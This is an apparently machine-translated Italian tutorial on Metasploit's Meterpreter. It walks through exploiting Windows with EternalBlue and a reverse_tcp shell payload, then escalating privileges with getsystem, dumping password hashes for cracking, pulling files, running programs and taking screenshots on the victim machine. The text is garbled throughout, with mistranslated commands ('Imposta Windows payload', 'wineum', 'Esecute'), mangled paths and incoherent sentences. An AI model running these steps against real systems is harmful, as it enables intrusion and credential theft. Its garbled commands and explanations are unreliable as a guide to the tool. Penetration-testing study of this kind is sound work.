Introduzione a MeterPreter
MeterPreter è un payload di attacco nel framework Metasploit che consente al perpetratore di controllare e navigare nel computer della vittima attraverso una shell di comando. Può rivelarsi uno strumento molto versatile quando si tratta di test di penetrazione. È uno strumento post-sfruttamento che si basa sull'iniezione di DLL in memoria, il che significa che ottiene la DLL iniettata in esecuzione creando un nuovo processo che richiede che il sistema esegui la DLL iniettata. Può darti accesso a una shell di comando invisibile su una macchina per vittime, permettendo di eseguire eseguibili e reti di profilo.
È stato originariamente scritto per Metasploit 2.X ed è aggiornato per Metasploit 3.
Discuteremo in dettaglio gli usi di MeterPreter, ma prima, facciamo una parola sui payload in generale
Cosa sono i payload?
I payload in Metasploit sono moduli, il che significa che sono snippet di codici all'interno di Metasploit che vengono eseguiti sul sistema remoto. Il modulo di exploit viene inviato per primo, che installa il modulo payload sul sistema. Quindi il carico utile concede l'accesso all'attaccante (limitato o a pieno titolo, dipende dal contenuto del carico utile). Per elaborare ulteriormente il funzionamento dei payload, dobbiamo discutere i suoi tipi, che sono 3 in totale:
Single
Questi carichi utili sono completamente autonomi, il che significa che questi possono essere basibili quanto i codici gatekeeper che consentono all'utente di entrare in un sistema di destinazione.
Stager
Gli stager sono carichi utili che raccolgono applicazioni all'interno del sistema target e lo inviano all'attaccante. Stabilisce la connessione tra la vittima con la nostra macchina locale.
Fasi
Una volta che gli stager hanno accesso al sistema, scaricano i moduli delle fasi. Moduli stadi rimuovere il tappo di dimensioni sul meterpreter.
Esempi di fasi sarebbero una shell semplice, iPhone "ipwn" Shell, Moduli MeterPreter, Iniezione VNC.
Puoi capire il tipo di payload immaginando il suo nome. I singoli payload sono generalmente del formato /
Sfruttamento con MeterPreter
Prima di tutto, avviare la console MSF digitando il seguente comando terminale nella finestra del terminale Kali.
$ sudo msfconsole
Stiamo usando inverse_tcp come stager e meterpreter come stadio.
Inizieremo impostando l'eterno blu exploit. Seleziona (MS17_010_EternalBlue) quindi impostare Windows/x64/meterpreter/reverse_tcp come payload selezionato
Quindi, configurare le impostazioni di exploit, quindi eseguire Exploit con il comando Exploit:
$ Imposta Windows payload/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploit
IL EternalBlue Exploit è stato attivato con successo.
Post sfruttamento
Accediamo e manipoliamo il sistema già compromesso durante lo sfruttamento post-espulsione.
Possiamo fare molte cose ora che abbiamo accesso al sistema, ma come menzionato sopra, dobbiamo rimanere concentrati principalmente per il download di informazioni e l'ottenimento delle credenziali dell'utente qui
Gestione del privilegio di accesso:
A seconda del modulo payload e dell'exploit che hai usato, potresti trovarti di fronte a determinate restrizioni di accesso che paralizzano gravemente le tue capacità di manovrare la macchina da vittima. Puoi aggirare questo problema con l'escalation dei privilegi attraverso l'eliminazione delle password e la manomissione dei registri. Puoi anche intensificare i privilegi utilizzando il sistema Get System di MeterPreter.
$ getsystem
$ getUid
Trasferimento di file con meterpreter
Con MeterPreter, puoi scaricare un file utilizzando il comando $ download.
$ Download/Windows/System32/Driver/ETC/Host
Allo stesso modo, è possibile caricare anche informazioni sulla macchina, utilizzando $ upload-comando
Estrarre le credenziali dell'utente:
Utilizzare Codice Script Credential_Collector per estrarre le informazioni degli account utente o utilizzare il modulo di pubblicazione dump hash per effetto simile.
Useremo il modulo Hash Dump Post per procedere con la raccolta delle credenziali. Digita il seguente comando MSF.
$ run post/Windows/Gather/Hashdump
Come possiamo vedere, abbiamo ottenuto i conti Coen, Guest e Admin. L'Hash LM (amministratore) e l'hash NTLM (ospite) riguarda le password vuote, mentre l'hash Coen è una password di cui dovrai decifrare. Puoi farlo utilizzando una password cracker.
Automatizzare il raschiatura del sistema
Può essere noioso raccogliere informazioni con le singole dichiarazioni di input che devi continuare a alimentare la shell del comando. Convenientemente, è possibile automatizzare in qualche modo questo processo con il vigneto. Lo script raccoglie informazioni dalla vittima e scarica i dati nella nostra macchina locale. Ti verrà detto dove viene salvato l'output, come puoi vedere nella quarta riga dall'alto:
$ run wineum
Tieni presente che il percorso in cui è archiviato l'output per ciascun comando potrebbe essere diverso da quello al display qui.
Facciamo un casino un po 'di più
Eseguire i file
È possibile eseguire qualsiasi file sul sistema utilizzando: Esegui -f . Ciò include sia file e programmi eseguibili con più file di supporto. Ad esempio, per eseguire l'app Calcolatrice integrata nel sistema operativo Windows, digitare -f calc.exe
Prendendo screenshot
È inoltre possibile acquisire schermate dal punto di vista dell'utente. Basta digitare lo screenshot nella shell di comando di MeterPreter e otterrai uno screenshot del display sul sistema.
$ Esecute -f Calc.exe
$ screenshot
Conclusione:
Questa è stata una breve introduzione al plug -in Meterpreter nel framework Metasploit, insieme a una breve guida che mostra i suoi usi più basilari. Abbiamo imparato qui come possiamo violare un sistema di sistema operativo Windows con EternalBlue Exploit per ottenere l'accesso, quindi utilizzare MeterPreter per intensificare i privilegi, raccogliere informazioni manualmente e mediante automatizzare il comando Vineus. Abbiamo anche imparato a eseguire file sulla macchina per vittime.
MeterPreter può servire come mezzo apprezzabile di rilevamento della vulnerabilità, nonostante sia un conglomerato di strumenti di base all'interno del framework di Metasploit.